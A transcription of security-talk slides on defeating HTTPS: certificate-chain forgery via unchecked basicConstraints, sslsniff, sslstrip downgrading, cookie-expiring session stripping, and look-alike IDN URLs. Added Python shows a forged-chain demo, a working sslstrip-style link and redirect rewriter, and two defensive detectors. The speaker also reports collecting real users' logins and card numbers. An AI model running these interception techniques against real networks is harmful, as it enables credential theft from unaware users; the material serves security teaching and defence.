The Back Story



SSL And Certificate Chaining

[Screenshot: Firefox certificate viewer, General tab, for www.paypal.com]

This certificate has been verified for the following uses: SSL Server Certificate

Issued To
  Common Name (CN): www.paypal.com
  Organization (O): PayPal, Inc.
  Organizational Unit (OU): Information Systems
  Serial Number: 63:4D:CE:1C:61:9F:FB:6B:26:1E:05:AD:5B:A9:85:86

Issued By
  Common Name (CN): Verisign Class 3 Extended Validation SSL SGC CA
  Organization (O): Verisign, Inc.
  Organizational Unit (OU): Verisign Trust Network

Validity
  Issued On: 05/01/2008
  Expires On: 05/02/2009

Fingerprints
  SHA1 Fingerprint: A4:25:F6:7E:D2:C9:AC:D6:DE:F6:53:DA:79:5E:01:C5:17:B3:75:2D
  MD5 Fingerprint: 22:B7:78:93:7D:BA:56:8B:84:BD:F9:A9:74:70:07:00



You probably know what they do... 



More specifically... 



CA Certificate
  Embedded in browser.
  All powerful.
  Certifies that a site certificate is authentic.

Site Certificate
  Not embedded in browser.
  Known to be authentic based on the CA Certificate's signature.

CA Certificate
  Embedded in browser.
  All powerful.
  Certifies that an intermediate CA is authentic.

Intermediate CA Certificate
  Not embedded in browser, but sort of all-powerful.
  Certifies that a site certificate is authentic.

Site Certificate
  Known to be authentic based on the Intermediate CA Certificate's signature.



Certificate Chains Can Be > 3 




How do we validate these things? 



Almost everyone tells you the same story.



What they say 



Verify that the leaf node has the name of the site 
you're connecting to. 

Verify that the leaf node hasn't expired. 

Check the signature. 

If the signing certificate is in our list of root CAs, stop.

Otherwise, move one up the chain and repeat. 



Here Be Dragons 








Very tempting to use a 
simple recursive 
function. 

Everyone focuses on the 
signature validation. 

The result of a naive 
attempt at validation is 
a chain that is complete, 
but nothing more. 






Something must be wrong, but...

All the signatures are valid.
Nothing has expired.
The chain is intact.

The root CA is embedded in the browser and trusted.

But we just created a valid certificate for PayPal, and we're not PayPal?



The missing piece...

is a somewhat obscure field

[Terminal: openssl x509 -text output for a leaf certificate]

        f8:c9:0f:24:d2:c7:c2:92:0c:13:54:93:d5:9b:c7:
        0e:fa:19:a8:d5:d3:f7:ab:5d
    Exponent: 65537 (0x10001)
X509v3 extensions:
    X509v3 Key Usage: critical
        Digital Signature, Non Repudiation, Key Encipherment, Data Encipherment
    X509v3 Subject Key Identifier:
        DF:48:EF:25:BF:D2:23:B0:F0:C2:AC:FA:5A:85:50:74:FF:F9:34:EF
    X509v3 CRL Distribution Points:
        URI:http://crl.geotrust.com/crls/globalca1.crl
    X509v3 Authority Key Identifier:
        keyid:BE:A8:A0:74:72:50:6B:44:B7:C9:23:D8:FB:A8:FF:B3:57:6B:68:6C
    X509v3 Extended Key Usage:
        TLS Web Server Authentication, TLS Web Client Authentication
--> X509v3 Basic Constraints: critical
-->     CA:FALSE
Signature Algorithm: sha1WithRSAEncryption
    7a:58:f9:88:14:cb:77:32:aa:83:12:de:d9:15:74:8e:34:e3:
    66:ca:bc:24:2c:28:96:54:cd:be:51:56:60:87:e3:be:c6:2e:
    86:7e:74:c1:68:01:b6:8c:07:c6:a2:0c:a4:36:ca:e1:a8:e9:



Back In The Day 



Most CAs didn't explicitly set basicConstraints: CA=FALSE.

A lot of web browsers and other SSL 
implementations didn't bother to check it, whether 
the field was there or not. 

Anyone with a valid leaf node certificate could 
create and sign a leaf node certificate for any 
other domain. 

When presented with the complete chain, IE, 
Konqueror, OpenSSL, and others considered it 
valid. 



And then in 2002 



Microsoft did something particularly annoying, and 
I blew this up by publishing it. 

Microsoft claimed that it was impossible to exploit. 

So I also published a tool that exploits it. 



sslsniff

Client Side:
  Intercepts HTTPS traffic.
  Generates a certificate for the site the client is connecting to.
  Signs that with whatever certificate you specify.
  Proxies data through.

Server Side:
  Makes a normal HTTPS connection to the server.
  Sends and receives data as if it's a normal client.



sslsniff 




Back before people started checking BasicConstraints:

All you had to do was pass sslsniff a valid leaf node certificate for any domain.

It would automatically generate a certificate for the domain the client was connecting to, on the fly.

It would sign that certificate with the leaf node.

IE, Konqueror, etc... wouldn't notice the difference.
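An added worked example of the two passages above, the "what they say" chain walk and the sslsniff trick of signing a leaf with a leaf. This is not code from the talk or from sslsniff. It builds a toy PKI (root, intermediate, a legitimate leaf for the made-up host evil.example), then does what sslsniff did: mints a certificate for www.paypal.com signed by that leaf. The naive walk accepts the forged chain; the walk that also checks basicConstraints and the issuer linkage rejects it. The names, the "day" timestamps and the textbook RSA over roughly 40-bit moduli are all constructed here so the script runs offline with only the standard library; none of it is usable cryptography.

```python
"""Chain validation, naive versus basicConstraints-aware (added example).
Textbook RSA over ~40-bit moduli stands in for real signatures so this
runs with the standard library alone; it is not a usable crypto library."""
import hashlib
from dataclasses import dataclass
from math import gcd

def _is_prime(n):
    return n >= 2 and all(n % i for i in range(2, int(n ** 0.5) + 1))

def _next_prime(n):
    while not _is_prime(n):
        n += 1
    return n

def keygen(seed):
    """Deterministic toy RSA key pair from an integer seed: (public, private)."""
    e = 65537
    p = _next_prime(seed)
    q = _next_prime(seed + 7919)
    while gcd(e, (p - 1) * (q - 1)) != 1:
        q = _next_prime(q + 1)
    n = p * q
    return (n, e), (n, pow(e, -1, (p - 1) * (q - 1)))

def _digest(data, n):
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n

def sign(priv, data):
    n, d = priv
    return pow(_digest(data, n), d, n)

def verify(pub, data, sig):
    n, e = pub
    return pow(sig, e, n) == _digest(data, n)

@dataclass
class Cert:
    subject: str
    issuer: str
    pub: tuple
    ca: bool          # basicConstraints CA flag
    not_after: int    # toy validity, in "days"
    sig: int = 0      # issuer's signature over tbs()

    def tbs(self):
        return f"{self.subject}|{self.issuer}|{self.pub}|{self.ca}|{self.not_after}".encode()

def issue(subject, issuer, pub, ca, not_after, issuer_priv):
    cert = Cert(subject, issuer, pub, ca, not_after)
    cert.sig = sign(issuer_priv, cert.tbs())
    return cert

def naive_validate(chain, roots, hostname, now):
    """The walk 'everyone tells you': leaf name, leaf expiry, signatures, root."""
    leaf = chain[0]
    if leaf.subject != hostname or leaf.not_after < now:
        return False
    for cert, issuer in zip(chain, chain[1:]):
        if not verify(issuer.pub, cert.tbs(), cert.sig):
            return False
        if roots.get(issuer.subject) == issuer.pub:
            return True
    return False

def validate(chain, roots, hostname, now):
    """The same walk plus the checks the naive version leaves out."""
    leaf = chain[0]
    if leaf.subject != hostname or leaf.not_after < now:
        return False
    for cert, issuer in zip(chain, chain[1:]):
        if cert.issuer != issuer.subject:   # the chain has to actually link up
            return False
        if not issuer.ca:                   # basicConstraints: a leaf may not sign
            return False
        if issuer.not_after < now:          # every certificate on the path is checked
            return False
        if not verify(issuer.pub, cert.tbs(), cert.sig):
            return False
        if roots.get(issuer.subject) == issuer.pub:
            return True
    return False

def build_scenario():
    """Root -> intermediate -> evil.example leaf -> forged www.paypal.com leaf."""
    root_pub, root_priv = keygen(1_000_003)
    inter_pub, inter_priv = keygen(2_000_003)
    evil_pub, evil_priv = keygen(3_000_017)
    forged_pub, _ = keygen(4_000_037)
    root = issue("Toy Root CA", "Toy Root CA", root_pub, True, 5000, root_priv)
    inter = issue("Toy Intermediate CA", "Toy Root CA", inter_pub, True, 4000, root_priv)
    evil = issue("evil.example", "Toy Intermediate CA", evil_pub, False, 3000, inter_priv)
    # What sslsniff did: sign a certificate for the victim's site with a leaf (CA:FALSE).
    forged = issue("www.paypal.com", "evil.example", forged_pub, False, 3000, evil_priv)
    return [forged, evil, inter, root], {root.subject: root.pub}

def demo(now=2000):
    """Run both validators over the forged chain; the entry point for readers."""
    chain, roots = build_scenario()
    return {"naive": naive_validate(chain, roots, "www.paypal.com", now),
            "strict": validate(chain, roots, "www.paypal.com", now)}
```

Calling demo() returns naive True and strict False: every signature in the forged chain checks out and it ends in a trusted root, exactly the situation the slides describe, and only the CA flag on the issuer gives it away. Real validators also enforce pathLenConstraint, keyUsage keyCertSign and name constraints; those are left out here to keep the contrast to one field.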



sslsniff post-disclosure 



You'd be surprised who still doesn't check basic 
constraints. 

Even when people got warning dialogs in browsers 
that had been fixed, most of the time they'd just 
click through them. 

Still useful as a general MITM tool for SSL. 

The folks who did the MD5 hash collision stuff 
used sslsniff to hijack connections once they'd 
gotten a CA cert. 

There are other uses yet, to be disclosed another 
day. 



Surely we can do better. 



The things you learn in TV studios

[Screenshot: http://www.bankofamerica.com/index.jsp in Firefox, loaded over plain HTTP. The Online Banking sign-in form (Enter Online ID, Save this Online ID, Passcode, Sign In) sits directly on the HTTP home page.]






The things you learn in TV studios



This button posts to an HTTPS link, but there's no way to 
know that. 

It's a button, so if you mouse-over it, the link isn't displayed 
in the browser bar at the bottom. 

The best you could do would be to view the page source, 
but that's problematic in browsers like Firefox that issue a 
second request to the server for the source. 



Still prevalent today...

[Screenshot: http://www.wachovia.com/ in Firefox, loaded over plain HTTP, with the Login form (User ID, Remember my User ID, Password, Service, Login) on the page. The page also reads "Wachovia is now part of Wells Fargo."]



Still prevalent today...

[Screenshot: http://login.live.com/login.srf?wa=wsignin1.0&rf (URL truncated in the screenshot) in Firefox, loaded over plain HTTP: the Windows Live ID sign-in form (Windows Live ID, Password, Remember me on this computer, Remember my password, Sign in, "Use enhanced security").]



There are some generalizable attacks here.



Browsers Then And Now... 



Then: A Positive Feedback System 



A number of indicators deployed to designate that 
a page is secure. 

A proliferation of little lock icons. 

URL bars that turn gold. 



Then: An example from Firefox 2

[Screenshot, Firefox 2: https://login.yahoo.com/config/mail?.intl=us, the Yahoo! Mail sign-in page, with the browser's positive indicators showing: the URL bar shaded gold and the lock with "login.yahoo.com" in the status bar.]






Then: An example from Firefox 2

[Screenshot, Firefox 2: https://www.riseup.net, with the certificate warning dialog over the page]

Unable to verify the identity of admin.riseup.net as a trusted site.
Possible reasons for this error:

- Your browser does not recognize the Certificate Authority that issued the site's certificate.
- The site's certificate is incomplete due to a server misconfiguration.
- You are connected to a site pretending to be admin.riseup.net, possibly to obtain your confidential information.

Please notify the site's webmaster about this problem.

Before accepting this certificate, you should examine this site's certificate carefully. Are you willing to accept this certificate for the purpose of identifying the Web site admin.riseup.net?

[Examine Certificate...]

( ) Accept this certificate permanently
(o) Accept this certificate temporarily for this session
( ) Do not accept this certificate and do not connect to this Web site

[Cancel] [OK]






Now: A Negative Feedback System 



Less emphasis on sites being secure. 

The proliferation of little locks has been toned 
down. 

Firefox's gold bar is gone. 

More emphasis on alerting users to problems. 

A maze of hoops that users have to jump through 
in order to access sites with certificates that aren't 
signed by a CA. 



Now: An example from Firefox 3

[Screenshot, Firefox 3: https://login.yahoo.com/config/login_verify2?&.src=ym, the same Yahoo! Mail sign-in page. The gold URL bar is gone; only the small site-identity indicator next to the address and "login.yahoo.com" in the status bar remain.]






Now: An example from Firefox 3

[Screenshot, Firefox 3: https://www.riseup.net, replaced by the browser's error page]

Secure Connection Failed

www.riseup.net uses an invalid security certificate.

The certificate is not trusted because the issuer certificate is unknown.
The certificate is only valid for admin.riseup.net

(Error code: sec_error_unknown_issuer)

- This could be a problem with the server's configuration, or it could be someone trying to impersonate the server.
- If you have connected to this server successfully in the past, the error may be temporary, and you can try again later.

Or you can add an exception...



Now: An example from IE

[Screenshot, Internet Explorer: https://www.riseup.net, "Certificate Error: Navigation Blocked"]

There is a problem with this website's security certificate.

The security certificate presented by this website was not issued by a trusted certificate authority.

The security certificate presented by this website was issued for a different website's address.

Security certificate problems may indicate an attempt to fool you or intercept any data you send to the server.

We recommend that you close this webpage and do not continue to this website.

  Click here to close this webpage.
  Continue to this website (not recommended).
  More information



Conclusions 



If we trigger the negative feedback, we're 
screwed. 

If we fail to trigger the positive feedback, it's not 
so bad. 



How is SSL used? 



Nobody types https:// 
(or http:// for that matter) 



People generally encounter SSL in only two ways:

Clicking on links.
Through 302s.



Which means that people only 
encounter SSL through HTTP... 



First cut: A different kind of MITM




Remember: 

SSL is normally encountered in one of two ways 

By clicking on links. 
Through 302 redirects. 



We can attack both of those points through an HTTP MITM.



A First Cut Recipe: sslstrip




How does it look?

Secure Site

[Screenshot: "Welcome to Gmail", the Gmail sign-in page (Username, Password, Remember me on this computer, Sign in) as served by the real site over HTTPS.]

[Screenshots: the same Gmail sign-in page as the victim sees it through sslstrip, delivered over plain HTTP, with the same page content.]
What else can we do?



We've managed to avoid the negative feedback, 
but some positive feedback would be good too. 

People seem to like the little lock icon thing, so it'd 
be nice if we could get that in there too. 



A 1.5 Cut: sslstrip 




What should our favicon be? 

You guessed it: 
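An added example covering the two sslstrip passages above, the first cut (links and 302s) and the 1.5 cut (the lock favicon); it is a model of the technique, not sslstrip's own code. Sitting on the victim's HTTP path, the proxy rewrites Location headers on redirects from https:// to http://, rewrites https:// links and form actions in HTML the same way, remembers which (host, path) pairs it downgraded so the victim's later plain-HTTP requests for them can be forwarded to the real server over HTTPS, and swaps the page's favicon for a lock image. The hostnames www.bank.example, mail.example and attacker.invalid, the lock image URL, and the sample redirect and page are all constructed here; nothing is captured from a real site.

```python
"""sslstrip-style HTTP response rewriting (added example, not the tool's code).
The proxy sits on the victim's HTTP path; the victim never sees https://."""
import re
from urllib.parse import urlsplit

HTTPS_URL = re.compile(r"https://[^\s\"'<>]+")
ICON_LINK = re.compile(r"<link[^>]*rel=[\"']?(?:shortcut )?icon[\"']?[^>]*>", re.I)
HEAD_TAG = re.compile(r"<head[^>]*>", re.I)

class Stripper:
    def __init__(self, lock_favicon="http://attacker.invalid/lock.ico"):
        self.lock_favicon = lock_favicon   # hypothetical lock image served by the attacker
        self.secure = set()                # (host, path) pairs that were https:// upstream

    def strip_url(self, url):
        """https://host/path -> http://host/path, remembering the pair."""
        parts = urlsplit(url)
        if parts.scheme != "https":
            return url
        self.secure.add((parts.netloc, parts.path or "/"))
        return "http://" + url[len("https://"):]

    def upstream_scheme(self, host, path):
        """Scheme to use when forwarding the victim's request to the real server."""
        return "https" if (host, path) in self.secure else "http"

    def rewrite_headers(self, headers):
        """Attack point 1: a 302 to https:// becomes a 302 to http://."""
        return {k: (self.strip_url(v) if k.lower() == "location" else v)
                for k, v in headers.items()}

    def rewrite_body(self, html):
        """Attack point 2: every https:// link or form action becomes http://.
        1.5 cut: drop the site's favicon and put a lock in its place."""
        html = HTTPS_URL.sub(lambda m: self.strip_url(m.group(0)), html)
        html = ICON_LINK.sub("", html)
        lock = f'<link rel="icon" href="{self.lock_favicon}">'
        return HEAD_TAG.sub(lambda m: m.group(0) + lock, html, count=1)

    def rewrite_response(self, status, headers, body):
        """Headers assumed in canonical case; a real proxy normalises them first."""
        headers = self.rewrite_headers(headers)
        if "text/html" in headers.get("Content-Type", ""):
            body = self.rewrite_body(body)
            if "Content-Length" in headers:     # the body length changed
                headers["Content-Length"] = str(len(body.encode()))
        return status, headers, body

def demo():
    """Constructed sample traffic: one redirect and one login page."""
    s = Stripper()
    redirect = s.rewrite_headers({"Location": "https://www.bank.example/login"})
    page = ('<html><head><title>Bank</title>'
            '<link rel="shortcut icon" href="/favicon.ico"></head><body>'
            '<form action="https://www.bank.example/auth" method="post">'
            '<a href="https://mail.example/">mail</a></form></body></html>')
    _, headers, body = s.rewrite_response(
        "200 OK", {"Content-Type": "text/html", "Content-Length": str(len(page))}, page)
    return {"location": redirect["Location"], "body": body,
            "content_length": headers["Content-Length"],
            "auth_upstream": s.upstream_scheme("www.bank.example", "/auth"),
            "root_upstream": s.upstream_scheme("www.bank.example", "/")}
```

After demo(), the redirect points at http://www.bank.example/login, the page contains no https:// at all, the only icon link is the attacker's lock, and the proxy knows that a later POST to http://www.bank.example/auth has to go to the server over HTTPS while a request for / can stay plain. A working proxy also has to handle compressed and chunked bodies, the Secure flag on cookies, and the request side of the mapping; this block stops at the response rewriting the slides describe.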




Once again, a secure site

[Screenshot: the Gmail sign-in page as served over HTTPS.]



We're doing pretty good.

We've avoided the negative feedback of

[Screenshot: the Firefox 3 "Secure Connection Failed" page for www.riseup.net shown earlier (sec_error_unknown_issuer).]



We can do a subtle MITM via HTTP.

[Screenshot: the Gmail sign-in page as delivered through sslstrip over plain HTTP.]



And if we want we can throw in a little lock

[Screenshot: the same Gmail sign-in page through sslstrip, now with a lock as the page's favicon.]
[Screenshots: Wachovia online banking login page (two slides)]

The sites themselves confuse us 
[Screenshot: PayPal home page with account login form]

The sites themselves confuse us 
[Screenshot: PayPal home page with account login form]

A Few Gotchas 



Content encodings that are difficult to parse 
(compress, gzip, etc.) 

Secure cookies won't get sent over HTTP that's 
been stripped of SSL. 

Cached pages that don't give us a chance to swap 
out their links. 



A Simple Solution 

Strip all that stuff too. 

Kill the secure bit on Set-Cookie statements, strip 
the content encodings we don't like from client 
requests, and strip if-modified-since headers too. 



Another problem: sessions 



The most interesting stuff to log is the POSTs that 
would have been sent via SSL. 

Particularly, usernames/passwords. 

Sessions often cause us to miss the login step, 
which is unfortunate. 

Sure, we can get the session cookie, but that's 
small change. 



So let's strip sessions too. 

[Diagram: session-stripping exchange]
1. Client request (with its cookies).
2. 302 for the same URL, but with Set-Cookie: headers that expire all the cookies we got from the request.
3. Request again (sans cookies).


And a little less sketchy... 

Sessions expire, and it's not always clear when or why, 
but they don't usually expire right in the middle of an 
active session. So what we do now: 

When we start a MITM against a network, strip all 
the traffic immediately, but don't touch the 
cookies for 5 min (or some specified length of 
time). 

As the cookies go by, make note of the active 
sessions. 

After the time is up, start killing sessions, but only 
new sessions that we haven't seen before. These 
should be the "long running" sessions that won't 
be seen as suspicious should they disappear. 
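The session-killing redirect described above (a 302 back to the very URL the client asked for, carrying Set-Cookie headers that expire the cookies the client just sent) is a distinctive pattern that a proxy log review or passive monitor can check for. The following detector is an added defensive example, not code from the talk or from sslstrip; the hostname, paths and cookie names in the sample exchange are constructed for this example.

```python
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Constructed sample exchange (hostname and cookie names are made up for this example);
# the response has the shape of the session-killing 302 described on the slides.
NOW = datetime(2009, 2, 18, tzinfo=timezone.utc)
SAMPLE_REQUEST = ("GET /mail/ HTTP/1.1\r\nHost: mail.example.com\r\n"
                  "Cookie: SID=abc123; PREF=lang=en\r\n\r\n")
SAMPLE_STRIP_RESPONSE = (
    "HTTP/1.1 302 Found\r\nLocation: http://mail.example.com/mail/\r\n"
    "Set-Cookie: SID=deleted; Expires=Thu, 01 Jan 1970 00:00:00 GMT; Path=/\r\n"
    "Set-Cookie: PREF=deleted; Max-Age=0; Path=/\r\n\r\n")

def parse_message(raw):
    """Start line plus (lower-cased name, value) header pairs of an HTTP message."""
    start, *lines = raw.partition("\r\n\r\n")[0].split("\r\n")
    return start, [(n.strip().lower(), v.strip()) for n, _, v in (l.partition(":") for l in lines)]

def request_cookie_names(headers):
    """Names of the cookies the client presented in its Cookie header."""
    return {p.split("=", 1)[0].strip() for n, v in headers if n == "cookie"
            for p in v.split(";") if "=" in p}

def _expired(attr, now):
    """True for a Set-Cookie attribute that deletes the cookie (Max-Age <= 0 or a past Expires)."""
    key, _, val = (s.strip() for s in attr.partition("="))
    if key.lower() == "max-age":
        return val.lstrip("-").isdigit() and int(val) <= 0
    try:
        exp = parsedate_to_datetime(val) if key.lower() == "expires" else None
    except (TypeError, ValueError):
        return False
    return exp is not None and (exp if exp.tzinfo else exp.replace(tzinfo=timezone.utc)) <= now

def expiring_cookie_names(headers, now):
    """Names of cookies that the response's Set-Cookie headers expire or delete."""
    names = set()
    for name, value in headers:
        pair, *attrs = (p.strip() for p in value.split(";"))
        if name == "set-cookie" and any(_expired(a, now) for a in attrs):
            names.add(pair.split("=", 1)[0])
    return names

def detect_session_strip(request_raw, response_raw, now=None):
    """Cookie names killed by a 302 pointing back at the requested URL, else []."""
    req_line, req_h = parse_message(request_raw)
    resp_line, resp_h = parse_message(response_raw)
    requested = "http://" + dict(req_h).get("host", "") + req_line.split(" ")[1]
    if resp_line.split(" ")[1] != "302" or dict(resp_h).get("location") != requested:
        return []
    killed = expiring_cookie_names(resp_h, now or datetime.now(timezone.utc))
    return sorted(killed & request_cookie_names(req_h))
```

A legitimate logout also expires cookies, but it redirects somewhere else, which is why the detector insists that Location equal the requested URL.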



Some Results Of This Trick? 

login.yahoo.com 114 
Gmail 50 
ticketmaster.com 42 
rapidshare.com 14 
Hotmail 13 
paypal.com 9 
linkedin.com 9 
facebook.com 3 



In 24 Hours 



117 email accounts. 
16 credit card numbers. 
7 paypal logins. 

Over 300 other miscellaneous secure logins. 



Number of people that balked. 

0 



Where can we go from here? 



Combining this technique with homograph attacks. 



Standard homograph attack: 

Sometimes the glyphs of different characters look 
alike. PayPal.com looks like paypal.com but is 
really paypai.com 

Made more interesting by IDN. It became possible 
to register a domain with characters that appear 
identical to the glyphs of characters in the Latin 
character set. 

In 2005, Eric Johanson registered 
pаypal.com, which uses the Cyrillic 'a' look-alike 
character and displays as paypal.com 



Combining this technique with homograph attacks. 



What I don't like about the standard attack: 

The attack vector has to be targeted. By 
registering pаypal.com, all we can attack 
is paypal.com 

Phishing is really just too much work. It'd be nicer 
if we could just MITM a network and get whatever 
people are doing. 

The IDN stuff has been fixed. For TLDs like .com, 
Firefox renders the IDN characters as punycode 
both in the URL bar and the status bar. 



pаypal.com today 
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This website is hosted by 3ric Johanson. More information can be found Here . 
Also, if you happen to work for paypal, please get in touch with me. I'd like to give 
you your trademarked domain name back., please... 






So how can we reinvent this to attack SSL? 

We can't use .com or any TLD that Firefox will 
render into punycode. 

We want something that we can generalize, not 
just a simple substitution for some particular 
character in a domain. 

So, what's in most URLs? . / & ? 



one trick 



Register a domain like ijjk.cn 

Get a domain-validated SSL wildcard cert for 
*.ijjk.cn 

Use IDN-valid characters that look very similar to 
'/' and '?' to create false URLs. 

MITM HTTP and swap out the HTTPS links as usual. 

But this time, instead of just stripping the HTTPS 
links, we swap them out for our own look-alikes. 



one trick 



becomes 

The latter does not display as punycode in the 
status bar or the URL bar. 

When resolved, it becomes 
www.google.xn--comaccountsservicelogin-5j9pia.f.ijjk.cn 

When we MITM these connections, we do SSL on 
both ends, but are able to present our own valid 
*.ijjk.cn cert to the client. 
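The look-alike characters in both the standard homograph case (the Cyrillic а in pаypal.com) and the URL-syntax look-alikes used with the *.ijjk.cn wildcard are exposed by the same two defensive checks: converting the hostname to punycode, as Firefox does for .com, and flagging labels that mix scripts or contain non-ASCII characters whose Unicode names resemble URL syntax. This is an added example, not code from the talk; the FAKE_GOOGLE hostname, the choice of U+2044 FRACTION SLASH as the '/' look-alike, the first-word script heuristic and the URL_SYNTAX_WORDS list are this example's assumptions.

```python
import unicodedata

# Constructed sample hostnames. pаypal.com with a Cyrillic а is the case the slides describe;
# using U+2044 FRACTION SLASH as the '/' look-alike is this example's own assumption.
CYRILLIC_PAYPAL = "p\u0430ypal.com"
FAKE_GOOGLE = "www.google.com\u2044accounts\u2044ServiceLogin.ijjk.cn"
# Words in a Unicode character name that mark it as a look-alike for URL syntax (assumed list).
URL_SYNTAX_WORDS = ("SLASH", "SOLIDUS", "QUESTION MARK", "AMPERSAND", "FULL STOP")

def script_of(ch):
    """Crude script name: the first word of the character's Unicode name."""
    return unicodedata.name(ch, "UNKNOWN").split(" ")[0]

def to_ascii(hostname):
    """Punycode (IDNA) form of the hostname, which is what Firefox shows for .com."""
    return hostname.encode("idna").decode("ascii")

def suspicious_labels(hostname):
    """Reasons a hostname looks like a homograph: mixed scripts or URL-syntax look-alikes."""
    reasons = []
    for label in hostname.split("."):
        if label.isascii():
            continue
        scripts = {script_of(c) for c in label if c.isalpha()}
        if "LATIN" in scripts and len(scripts) > 1:
            reasons.append(f"{label!r}: mixes scripts {sorted(scripts)}")
        for c in label:
            name = unicodedata.name(c, "")
            if not c.isascii() and any(w in name for w in URL_SYNTAX_WORDS):
                reasons.append(f"{label!r}: U+{ord(c):04X} {name} looks like URL syntax")
    return reasons
```

The punycode form of pаypal.com is xn--pypal-4ve.com, which no longer resembles the brand; the slash look-alike is caught by the name check even when the label's letters are all Latin.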



Here We Go 

[Diagram: look-alike HTTPS exchange]
1. Request.
2. 302 for the same URL, but with Set-Cookie: headers that expire all the cookies we got from the request.
3. Request again (sans cookies).
4. Proxy HTTP back, and swap out all the HTTPS links for our own look-alike HTTPS links.
5. SSL request for a look-alike domain that we control.
6. Proxy data back from the actual domain.

An Example 
[Screenshot: PNC Bank home page with sign-on form]

An Example 
[Screenshot: PNC Bank home page with sign-on form (detail)]

Nice thing about this 



Happens in real-time. 

Generalized: 

Targets whatever secure sites people are 
browsing to at any moment. 

Doesn't require multiple certificates or 
restricting ourselves to popular sites. 

Once we get a secure POST, we can switch them 
back to a normal traffic stream. 



Lessons 



Lots of times the security of HTTPS comes down 
to the security of HTTP, and HTTP is not secure. 

If we want to avoid the dialogs of death, start 
with HTTP not HTTPS. 

Once we've got control of that, we can do all 
kinds of stuff to re-introduce the positive 
indicators people might miss. 



Other tricks... 



sslstrip 

http://www.thoughtcrime.org 



